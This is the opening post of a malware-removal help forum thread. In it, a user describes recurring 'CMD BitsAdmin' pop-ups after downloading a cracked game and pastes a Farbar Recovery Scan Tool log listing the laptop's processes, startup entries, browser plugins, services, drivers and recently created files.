CMD BitsAdmin


This topic is locked.
14 replies to this topic

#1 oneiric

  • Members
  • 9 posts

Posted 04 January 2018 - 09:37 PM

Heeeey, so basically I tried downloading a cracked game a few days ago and it turned out to be a virus. Also, whenever I start my laptop it pops up; it also pops up randomly.

[Attached screenshot: 2how0oa.jpg]

[Attached screenshot: mA86C2Z.jpg]


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02.01.2018
Ran by ouroboros (administrator) on ENJAY (05-01-2018 10:21:40)
Running from C:\Users\ouroboros\Desktop
Loaded Profiles: ouroboros (Available Profiles: ouroboros & Visitor)
Platform: Windows 10 Home Single Language Version 1709 16299.125 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Garena Online ) C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\gxxsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.2.2.524\AsusWSWinService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(ASUS) C:\Program Files (x86)\ASUS\ASUS GIFTBOX Desktop\ASUSGiftBoxDesktop.exe
(ASUS) C:\Program Files (x86)\ASUS\ROG MacroKey\MacroSrv.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
() C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.17123-0\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.17123-0\NisSrv.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ROG Gaming Center\ROGGamingKey.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUS) C:\Program Files (x86)\ASUS\ROG MacroKey\AsListen.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel® Corporation) C:\Program Files (x86)\Intel\Intel® Extreme Tuning Utility\XtuService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [630168 2017-09-29] (Microsoft Corporation)
HKLM\...\Run: [SS2UILauncher] => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\SS2UILauncher.exe [970720 2015-08-15] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-17] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.2.2.524\ASUSWSLoader.exe [63272 2015-06-01] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-11-09] (Oracle Corporation)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CheckNDISPortF0ac46] => C:\Program Files (x86)\Hostless Modem\Sun Broadband\CheckNDISPort_df.exe [417176 2013-01-14] ()
HKLM-x32\...\Run: [CancelAutoPlay_df] => C:\Program Files (x86)\Hostless Modem\Sun Broadband\CancelAutoPlay_df.exe [440648 2012-11-20] ()
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22041192 2014-08-27] (Skype Technologies S.A.)
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Run: [Google Update] => C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\GoogleUpdateCore.exe [601680 2017-11-14] (Google Inc.)
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Run: [Steam] => D:\Steam\steam.exe [3111712 2017-12-16] (Valve Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{13d2fa72-d1e4-4163-8069-bd2a738c08cc}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5c3cf4e3-0037-41c0-bf89-80c5028f3162}: [DhcpNameServer] 192.168.0.1 192.168.0.1
Tcpip\..\Interfaces\{5ff41fcb-f6c4-438d-a5eb-cc5c955c312a}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://asus15.msn.com/?pc=ASTE
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = 
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2017-12-19] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-12-19] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2017-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-12-22] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-05-01] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2017-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-12-22] (Oracle Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF DefaultProfile: iufruqdn.default
FF ProfilePath: C:\Users\ouroboros\AppData\Roaming\Mozilla\Firefox\Profiles\iufruqdn.default [2018-01-05]
FF Homepage: Mozilla\Firefox\Profiles\iufruqdn.default -> hxxp://mail.ru/cnt/10445?gp=811141
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_28_0_0_133.dll [2017-12-14] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-12-19] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.1.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2014-02-28] (VideoLAN)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_133.dll [2017-12-14] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-25] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-25] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-12-22] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-12-22] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-12-19] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2017-12-19] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-12-16] (NVIDIA Corporation)
FF Plugin-x32: @t.garena.com/garenatalk -> D:\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-15] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-11-01] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin HKU\S-1-5-21-1787623747-1286628437-3931833605-1001: @tools.google.com/Google Update;version=3 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin HKU\S-1-5-21-1787623747-1286628437-3931833605-1001: @tools.google.com/Google Update;version=9 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin HKU\S-1-5-21-1787623747-1286628437-3931833605-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\ouroboros\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-09] (Unity Technologies ApS)
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\ouroboros\AppData\Local\Google\Chrome\User Data\Default [2018-01-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ouroboros\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-01-05]
CHR Extension: (Chrome Media Router) - C:\Users\ouroboros\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-05]
CHR HKLM\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-05-25]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 AsHidService; C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe [111416 2015-06-27] (ASUSTek Computer Inc.)
R2 ASUS Rog Macro Key; C:\Program Files (x86)\ASUS\ROG MacroKey\MacroSrv.exe [492344 2015-07-03] (ASUS)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.2.2.524\AsusWSWinService.exe [71168 2015-06-01] (ASUS Cloud Corporation) [File not signed]
R2 ASUSGiftBoxDekstop; C:\Program Files (x86)\ASUS\ASUS GIFTBOX Desktop\ASUSGIFTBOXDesktop.exe [313488 2015-06-13] (ASUS) [File not signed]
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [6998536 2017-12-12] ()
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [7760552 2017-12-07] (Microsoft Corporation)
R2 esifsvc; C:\WINDOWS\SysWOW64\esif_uf.exe [1385640 2015-08-17] (Intel Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [373312 2015-04-15] (WildTangent)
R2 GarenaPlatform; C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\gxxsvc.exe [318272 2017-12-14] (Garena Online )
R2 ibtsiva; C:\WINDOWS\system32\ibtsiva.exe [190216 2016-10-15] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
S3 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-20] (Intel Corporation) [File not signed]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-20] () [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [207648 2015-09-19] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-11-29] ()
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519104 2017-12-16] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519104 2017-12-16] (NVIDIA Corporation)
S3 ROGGamingCenterService; C:\Program Files (x86)\ASUS\ROG Gaming Center\ROGGamingCenterService.exe [76032 2015-08-13] (ASUSTeK COMPUTER INC.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 ThunderboltService; C:\Program Files (x86)\Intel\Thunderbolt Software\tbtsvc.exe [1723048 2015-06-11] (Intel Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\NisSrv.exe [356176 2017-12-07] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MsMpEng.exe [105792 2017-12-07] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [654528 2015-05-27] (Wacom Technology, Corp.)
R2 XTU3SERVICE; C:\Program Files (x86)\Intel\Intel® Extreme Tuning Utility\XtuService.exe [19192 2015-08-13] (Intel® Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-11-29] (Intel® Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AsusSGDrv; C:\WINDOWS\system32\DRIVERS\AsusSGDrv.sys [138744 2015-08-18] (ASUS Corporation)
R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [53752 2015-08-17] (Intel Corporation)
R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [261624 2015-08-17] (Intel Corporation)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77432 2017-11-29] ()
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [250624 2016-10-15] (Intel Corporation)
R2 iocbios2; C:\Program Files (x86)\Intel\Intel® Extreme Tuning Utility\Drivers\IocDriver\64bit\iocbios2.sys [30224 2015-08-13] (Intel Corporation)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [193968 2018-01-05] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\DRIVERS\farflt.sys [110016 2018-01-05] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [46008 2018-01-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [253880 2018-01-05] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [94144 2018-01-05] (Malwarebytes)
R1 netfilter2; C:\WINDOWS\System32\drivers\netfilter2.sys [51904 2015-01-14] (Titan ARC Corp.)
R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7689728 2017-09-29] (Intel Corporation)
S3 nhi; C:\WINDOWS\System32\drivers\tbt81x.sys [122896 2015-06-29] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_40aceccb38b252dc\nvlddmkm.sys [17028552 2017-12-19] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-12-16] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [50624 2017-10-11] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-12-16] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [887552 2015-07-15] (Realtek )
R1 VBoxUSBMon; C:\WINDOWS\system32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46072 2017-12-07] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [288848 2017-12-07] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [129616 2017-12-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-05 10:21 - 2018-01-05 10:22 - 000024282 _____ C:\Users\ouroboros\Desktop\FRST.txt
2018-01-05 09:58 - 2018-01-05 09:58 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2018-01-05 09:52 - 2018-01-05 10:21 - 000000000 ____D C:\FRST
2018-01-05 09:51 - 2018-01-05 09:51 - 002393088 _____ (Farbar) C:\Users\ouroboros\Desktop\FRST64.exe
2018-01-05 09:38 - 2018-01-05 09:38 - 000193968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000253880 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000110016 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000094144 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000046008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2018-01-05 01:15 - 2018-01-05 10:03 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-01-03 19:57 - 2018-01-05 09:59 - 000000164 _____ C:\Users\ouroboros\AppData\Roaming\sp_data.sys
2018-01-03 15:12 - 2018-01-05 09:35 - 000000000 ____D C:\ProgramData\HitmanPro
2018-01-03 15:10 - 2018-01-03 15:12 - 011584088 _____ (SurfRight B.V.) C:\Users\ouroboros\Downloads\hitmanpro_x64.exe
2018-01-03 14:45 - 2018-01-05 09:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-01-03 14:45 - 2018-01-03 14:45 - 000001914 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-01-03 14:45 - 2018-01-03 14:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-01-03 14:45 - 2018-01-03 14:45 - 000000000 ____D C:\Program Files\Malwarebytes
2018-01-03 14:45 - 2017-11-29 09:11 - 000077432 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
